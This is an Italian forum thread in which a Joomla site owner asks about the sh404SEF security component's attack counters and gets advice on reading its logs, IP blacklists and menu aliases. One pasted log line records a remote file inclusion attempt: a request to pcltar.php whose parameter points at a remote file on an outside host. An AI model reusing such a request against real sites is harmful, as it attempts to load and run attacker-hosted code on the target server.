Sh404SEF - Info Menu Statistiche Attacchi

[veleno77]

Rieccomi..... volevo sapere come funziona il menu che mostra gli attacchi nel componente sh404sef.
in primo luogo ho visto che non si aggiorna automaticamente, devo premeere io update, poi a me mi segnala:

Attacks count     37

di cui :
remote file inclusion     17
Too many requests (flooding)     20

Cosa significano, cosa dovrei fare e come dovrei comportarmi??

[sali40]

fino a che leggi quei logs devi solo sorridere e ringraziare.

Significa solo che sh404sef ha bloccato quegli attacchi, niente di che.

Tra l'altro non è neppure detto che avrebbero avuto effetto, perché, a seconda dei metodi di inclusione di file remoti, può anche darsi che anche se non ci fosse stato sh404 joomla li avrebbe bloccati comunque 

In ogni caso sono pericoli scampati 

[veleno77]

AH..... meno male. ma non c'è un modo per cercare di capire da dove venivano, ed eventualmente bloccare gli ip?

[sali40]

certamente si. /administrator/component/com_sg404sef/logs

Li vedi i dettagli degli attacchi

In configurazione -> scheda sicurezza di sh404sef puoi costruire black o white list

Aspetterei, però. Non è conveniente bloccare range di ip.

I remote file inclusion possono anche essere stati fatti da lamers italiani. Non puoi bloccare tutto il range di alice o di libero o di fastweb etc etc

[veleno77]

sisi... però se magari vedo sempre uno stesso ip...
cmq non riesco a vedere la pagina che dici, nel componente non vi è nessun riferimento, se invece provo ad usarlo come url mi da errore 404

[sali40]

lo devi cercare via ftp

[veleno77]

aaahh ! è un file... ok

Senti ma per gli alias. allor aio ho due menu uno in top principale ed uno in left. quello in top riassume tutto il sito, mentre in posizione left varia in base alla sezione che si vede.
Cosa succede, che ad esempio ho due voci di menu per uno stesso articolo, in pratica se vado su il menu in top e clicco su Ubuntu mi fa veddere una introduzione ad ubuntu, lo stesso se poi ci clicco dal menu in left che appare dopo,
Conviene mettere gli alias che puntano ad uno solo?
ossia la seconda voce del menu nella pagina metterla come alias nel link del menu in top, in modo da indirizzare il traffico verso un unico link pur avendo due voci diverse?
Lo so probabilmente ho sbagliato già in partenza perchè per creare quel secondo menu avrei già li potuto usare tutti gli alias per le voci di menu, però ora è già così e penso non convenga riconvertire tutto il menu, o no?


EDIT:
mi devo preoccupare di questi ad esempio:

Codice: [Seleziona]

2009-01-26 14:23:08 [b]Flooding[/b] 87.0.213.7 host7-213-dynamic.0-87-r.retail.telecomitalia.it Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008123017 GranParadiso/3.0.5 GET //administrator/component/com_sg404sef/logs 10 requests in less than 10 seconds (max = 10)

2009-01-26 14:23:10 [b]Flooding[/b] 87.0.213.7 host7-213-dynamic.0-87-r.retail.telecomitalia.it Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008123017 GranParadiso/3.0.5 GET /administrator/component/com_sg404sef/logs 11 requests in less than 10 seconds (max = 10)

2009-01-26 03:01:54 [b]Flooding[/b] 87.118.110.189 ns.fx3753-dedic.hosting-ie.com Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) GET /distro/debian-e-derivate/ubuntu-kubuntu-xubuntu.html?showall=1 11 requests in less than 10 seconds (max = 10)

2009-01-25 22:16:01 [b]Image file name with command in[/b] URL 212.95.39.220 almlinux.kadeweb.com libwww-perl/5.79 GET /notizie/ultime-notizie.html//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? ho visto che si vedeono anche i passaggi dei crawler se non vedono le pagine 404.. molto comodo.

[sali40]

si, conviene sempre utilizzare gli alias, anche se, co munque, il traffico viene reindirizzato verso una sola url, visto il modo di lavorare di sh404. Avrai visto tante url per la stessa pagina, ma solo una riceve le visite

[veleno77]

sisi infatti continuo ad apprezzare sempre di più questo modulo... non so se  rifare quel menu o meno, al massimo poi vedo, comunque ho notato che molto del flooding capita se si cerca alla veloce più parole nel mio modulo di ricerca pixsearch (in ajax) infatti a dato errore di flooding anche a me, bhe segno che per ora tutto funziona bene.